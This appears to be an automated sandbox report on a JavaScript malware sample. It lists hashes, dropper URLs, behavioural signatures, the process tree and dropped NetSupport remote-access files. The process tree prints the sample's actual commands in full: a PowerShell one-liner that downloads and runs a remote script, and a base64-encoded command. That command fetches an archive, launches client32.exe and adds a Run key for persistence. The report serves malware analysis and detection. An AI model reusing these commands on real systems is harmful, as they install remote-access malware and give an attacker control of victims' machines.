Analysis

  • max time kernel
    92s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-02-2024 09:32

General

  • Target

    ARS17291729317291729.js

  • Size

    22KB

  • MD5

    f11df5cf2e7e9c6b39612f3f60d9e9f2

  • SHA1

    d919fe3bd69418f9e96569f9e73b4a1fa1cde9e9

  • SHA256

    2770b332ef571a1462e5a38778307106e16ba66dca58717fe40f6f76259b717b

  • SHA512

    1629a66eb3f8f48fa15d016995eb26f7b6342420eac8f34fdf42d514db1be5813df7a40f553b63da16b8eb6bde66d35297d23c63cffa252951988a28242e65bf

  • SSDEEP

    384:swbhSjLO+uDvTeLoxguxAR02OY4PLRyxag8YvA9DWWRUwuoLljIzPNWHvrHejQlJ:pwLOxvTeLoxguxARGPLRyxag8YvA9DWu

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://assime.ca/command.php

Extracted

Language
ps1
Source
URLs
exe.dropper

http://sakaleralo.com/ccea268b-8716-46be-9148-3e614b38a0df.txt

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS17291729317291729.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3604
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4080
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Nop -ExeCUtIONPol bYPASS -W hI -eNco QwBoAEQASQByACAAJABlAE4AdgA6AEwATwBDAEEAbABhAHAAcABEAGEAVABhADsAIAAkAEcAMgBmAGYAdwAwAGMAPQBbAGIAeQB0AGUAWwBdAF0AQAAoADgAMAAsACAANwA1ACwAIAAzACwAIAA0ACkAOwAgACQAawBuAHMAUABVADIAQQA9ACcAaAB0AHQAcAA6AC8ALwBzAGEAawBhAGwAZQByAGEAbABvAC4AYwBvAG0ALwBjAGMAZQBhADIANgA4AGIALQA4ADcAMQA2AC0ANAA2AGIAZQAtADkAMQA0ADgALQAzAGUANgAxADQAYgAzADgAYQAwAGQAZgAuAHQAeAB0ACcAOwAgACQAMwBsAEsAYwBVAEgAWAA9ACcAagBHAGgAVAB5AG8AaQBDAC4AegBpAHAAJwA7ACAAJABYAEYAeABiADMAPQAnAG0AbwBkAGUAbQBfAGcAcAByAHMAXwBtAG8AZAB1AGwAZQBzACcAOwAgACQARABFAGYAZgBJAFMAPQBpAE4AVgBPAEsAZQAtAFcAZQBCAHIAZQBxAFUAZQBzAHQAIAAtAFUAcgBJACAAJABrAG4AcwBQAFUAMgBBACAALQBVAHMARQBiAEEAcwBJAEMAUABhAFIAUwBJAE4AZwA7ACAAJABCAG0ASgBOAGcANQBmAD0AJABEAEUAZgBmAEkAUwAuAGMAbwBuAFQAZQBOAHQAOwAgACQATgBUADYAVgBPAEUAPQAkAGUATgB2ADoATABPAEMAQQBsAGEAcABwAEQAYQBUAGEALAAgACQAWABGAHgAYgAzACAALQBqAG8AaQBOACAAJwBcACcAOwAgACQAYwBrAGEAdQA4AD0AIgAkAGUATgB2ADoATABPAEMAQQBsAGEAcABwAEQAYQBUAGEAXAAkADMAbABLAGMAVQBIAFgAIgA7ACAAJABQAHgASQBCAFgAcwBvAEYAPQBbAEMAbwBOAFYARQBSAHQAXQA6ADoAZgByAG8AbQBiAGEAUwBlADYANABTAFQAcgBpAE4ARwAoACQAQgBtAEoATgBnADUAZgApADsAIAAkAEgANQBMAHoAawBIAFQAPQAkAFAAeABJAEIAWABzAG8ARgAgAC0AUwBQAGwASQBUACAAJwAgACcAIAAtAEEAcwAgAFsAQgB5AHQARQBbAF0AXQA7ACAAJAAxAFkASwBnAHMAcwBuAD0AJABHADIAZgBmAHcAMABjACsAJABIADUATAB6AGsASABUADsAIABTAGMAIAAkADMAbABLAGMAVQBIAFgAIAAkADEAWQBLAGcAcwBzAG4AIAAtAEUATgBDAG8AZABpAE4AZwAgAEIAWQBUAGUAOwAgAEUAeABwAEEAbgBkAC0AQQBSAEMAaABJAHYAZQAgAC0AcABBAHQAaAAgACQAYwBrAGEAdQA4ACAALQBkAEUAUwBUAGkAbgBBAFQAaQBvAE4AUABhAHQASAAgACQATgBUADYAVgBPAEUAIAAtAGYAbwBSAEMARQA7ACAAUgBJACAAJAAzAGwASwBjAFUASABYADsAIABDAEQAIAAkAE4AVAA2AFYATwBFADsAIAAkAFIAcQBQAHQAUQBkAD0AIgB7ADAAfQBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACIAIAAtAGYAIAAkAE4AVAA2AFYATwBFADsAIABzAHQAYQByAHQAIABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7ACAATgBlAHcALQBJAFQARQBtAFAAcgBPAFAARQByAHQAeQAgAC0AUABhAFQASAAgACcASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AJwAgAC0ATgBhAE0AZQAgACQAWABGAHgAYgAzACAALQBWAGEATABVAEUAIAAkAFIAcQBQAHQAUQBkACAALQBwAFIAbwBQAGUAcgBUAHkAVABZAFAARQAgACcAUwB0AHIAaQBuAGcAJwA7AA==
        3⤵
        • Blocklisted process makes network request
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4776
        • C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe
          "C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:1480

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    512c6cab650bfda6ef2995f6b515ed6f

    SHA1

    fec40abf4f5d74ea7f8828cee83770e423203083

    SHA256

    84871d83ecd410fb4ddede63061d9c521d876d47a8ffdbb8609378447ba0d262

    SHA512

    638fffef25de1c3e850eb4f4668c4fdafed7bde042b130325daf323b45d2784916381b410219473b5bbacb4c11c6b8b7ab892b3d5695edb0b0a0785233e8e19b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    0f6a3762a04bbb03336fb66a040afb97

    SHA1

    0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

    SHA256

    36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

    SHA512

    cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iisg2x4g.xib.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\modem_gprs_modules\HTCTL32.DLL

    Filesize

    101KB

    MD5

    28c8a8263249e68e073b7e07ea790233

    SHA1

    6229b94354c6a8c5b55607c999a61184e8134c72

    SHA256

    9479a76792083c185382ff937028d2eb4bb0b8fe7051bc812e8d8c2bd747b5cd

    SHA512

    ec69ab6c56feeb735661d009576176983911682edc352bb666a6b746641537468d0e4c75ac7371fcf1dd28358d139a8c517692293a17bb492ac8ed3174ebb674

  • C:\Users\Admin\AppData\Local\modem_gprs_modules\HTCTL32.DLL

    Filesize

    133KB

    MD5

    8685677d29cd28cd99365daba43bd91b

    SHA1

    c7f81001c1bffe138bedcb29f8695d0c32da2bcd

    SHA256

    6424c55ae5589e812f2233c0e579c78cce0a5b4dba9c52bd7d6f17a37575b924

    SHA512

    653e46604afa00e5594b90a50baab9fa3aefc79c56d5520031bbe423806f05211024b6c549d905a5bddebda5ae94af63bb18fdf759774b491ac5f00f43a1092a

  • C:\Users\Admin\AppData\Local\modem_gprs_modules\MSVCR100.dll

    Filesize

    153KB

    MD5

    4054ad31323fe183a5beff36509e5886

    SHA1

    bcdc25fffb6e1be98c44e60b33556d5e7bf94747

    SHA256

    aa3543e079d8cd6dfff32b842e87dc35916b63cab928697205ffa4059fdd2320

    SHA512

    3a26d685a36c4eedbba4777db883a2331743aaba629104d83b753500e986831cb0153f379207f5aec100f0b8d89a673476d317c874be9d4ea76ad6f9d2408f2a

  • C:\Users\Admin\AppData\Local\modem_gprs_modules\NSM.LIC

    Filesize

    259B

    MD5

    866c96ba2823ac5fe70130dfaaa08531

    SHA1

    892a656da1ea264c73082da8c6e5f5728abcb861

    SHA256

    6a7c99e4bd767433c25d6df8df81baa99c05dd24fa064e45c306ff4d954e1921

    SHA512

    0dafc66222bbfcb1558d9845ee4ddeb7a687561b08b86a07b66b120c22952a8082e041d9234d9c69c8ade5d4dae894d3f10afd7ba6dd3f057a08fb5d57c42112

  • C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICHEK.DLL

    Filesize

    18KB

    MD5

    a0b9388c5f18e27266a31f8c5765b263

    SHA1

    906f7e94f841d464d4da144f7c858fa2160e36db

    SHA256

    313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

    SHA512

    6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

  • C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICL32.DLL

    Filesize

    130KB

    MD5

    7937f859097b360b2cba516cf83ec59f

    SHA1

    ddc3a3c20ee7c406f312a8e1cbd4a5cbc0a5ee4e

    SHA256

    228a3ac9a4f0839c1fcd3e6208fe5c610928cac30ad38c1a19ac2af610fe0ca9

    SHA512

    ff89b4d531e7349eee60a75eedee1be6f2581a108669124c21c4a9a37cefd9dd081a65f3c24651cfae54a29a85b771ca02f162c390c9058ae307744244983115

  • C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICL32.dll

    Filesize

    161KB

    MD5

    8dd6ae67fced06599dd0643d18395338

    SHA1

    5972dae148c3ee037c3228d9797ef7bd054229fa

    SHA256

    74cc09260f7c2bc0e2022ec43eda5648023e02b2bc752a1808e1ef5b0d7695a6

    SHA512

    a7c5f12fcafaab7d9faa5045c5561465389f1c6e349292fa178d309ee60df00a01b7c7e5c5241373a7174a73700f92ff8fd206e2bc90505e1f49d09bc4dc55ef

  • C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe

    Filesize

    117KB

    MD5

    a2b46c59f6e7e395d479b09464ecdba0

    SHA1

    92c132307dd21189b6d7912ddd934b50e50d1ec1

    SHA256

    89f0c8f170fe9ea28b1056517160e92e2d7d4e8aa81f4ed696932230413a6ce1

    SHA512

    4f4479ddcd9d0986aec3d789f9e14f9285e8d9d63a5b8f73c9e3203d3a53cd575b1e15edf0d5f640816bb7f25bd3501244e0f7c181a716a6804742ed2f1cf916

  • C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.ini

    Filesize

    641B

    MD5

    2cd1a8115b7328756129052384e2eed6

    SHA1

    9458e9553d3d1f075ed09a06fda3f36136781704

    SHA256

    02ab893e7d31d7c3b18d27c3c4ef6e056da27cc6ad7efa76b8d4729403a067d2

    SHA512

    df5630c14f1400166ecbf0854a48616c939c0467634c427f8a287edc5c064c0d259b1cec0b02ae7aa31e21d1609ff31f4e11285160323f2c24fcb02de4e20455

  • C:\Users\Admin\AppData\Local\modem_gprs_modules\msvcr100.dll

    Filesize

    93KB

    MD5

    d36e2ebca79a97a3da7ae166355cb058

    SHA1

    862d93a5b3191efc72537af7a823345180483ca0

    SHA256

    09629d07055dd129387d8030e47f9f87be142938f7628ee16f3657ff3e7d408e

    SHA512

    be19f11682a5c47d0bcdfc7163aeb2825d119e797ad80bc2c2ab47a18632e3f833faf9fef3ae18d1410adad9e4f29291284ad0a2cbbe7450b7e81fc5a0264501

  • C:\Users\Admin\AppData\Local\modem_gprs_modules\pcicapi.dll

    Filesize

    32KB

    MD5

    dcde2248d19c778a41aa165866dd52d0

    SHA1

    7ec84be84fe23f0b0093b647538737e1f19ebb03

    SHA256

    9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

    SHA512

    c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

  • memory/4080-81-0x00007FFA49E30000-0x00007FFA4A8F1000-memory.dmp

    Filesize

    10.8MB

  • memory/4080-10-0x00007FFA49E30000-0x00007FFA4A8F1000-memory.dmp

    Filesize

    10.8MB

  • memory/4080-11-0x0000024BFB490000-0x0000024BFB4A0000-memory.dmp

    Filesize

    64KB

  • memory/4080-12-0x0000024BFB490000-0x0000024BFB4A0000-memory.dmp

    Filesize

    64KB

  • memory/4080-0-0x0000024BFD510000-0x0000024BFD532000-memory.dmp

    Filesize

    136KB

  • memory/4776-27-0x000001A81CCD0000-0x000001A81CCE2000-memory.dmp

    Filesize

    72KB

  • memory/4776-28-0x000001A81CCC0000-0x000001A81CCCA000-memory.dmp

    Filesize

    40KB

  • memory/4776-26-0x000001A81CCF0000-0x000001A81CD00000-memory.dmp

    Filesize

    64KB

  • memory/4776-23-0x000001A81CCF0000-0x000001A81CD00000-memory.dmp

    Filesize

    64KB

  • memory/4776-24-0x000001A81CCF0000-0x000001A81CD00000-memory.dmp

    Filesize

    64KB

  • memory/4776-22-0x00007FFA49E30000-0x00007FFA4A8F1000-memory.dmp

    Filesize

    10.8MB

  • memory/4776-77-0x00007FFA49E30000-0x00007FFA4A8F1000-memory.dmp

    Filesize

    10.8MB